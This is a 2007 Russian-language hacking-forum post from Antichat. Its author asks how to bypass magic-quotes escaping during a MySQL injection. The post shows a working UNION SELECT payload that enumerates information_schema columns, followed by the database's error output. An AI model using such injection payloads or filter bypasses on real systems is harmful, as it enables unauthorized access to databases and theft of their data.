ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Обход кавычки в mysql-inj?
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Обход кавычки в mysql-inj?
  #1  
Старый 20.11.2007, 03:56
Аватар для orcismylife
orcismylife
Познающий
Регистрация: 01.10.2007
Сообщений: 40
Провел на форуме:
172670

Репутация: 15
По умолчанию Обход кавычки в mysql-inj?
Версия
5.0.22-log

Нужно обойти кавычку...

=====
При построении запроса:

+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name='USER_PRIVILEGES'+limit+1,1/*

=====
Мускул выдает, что:

<...> '\'USER_PRIVILEGES\' limit 1,1/*' at line 1

Мэджик квотес судя по всему включены... Обойти как-то можно?

ЗЫ. Пробовал перевести в хекс - не получилось.
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL injection в MySql сервере версии 3,x bandera Чужие Статьи 3 04.06.2006 16:17
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ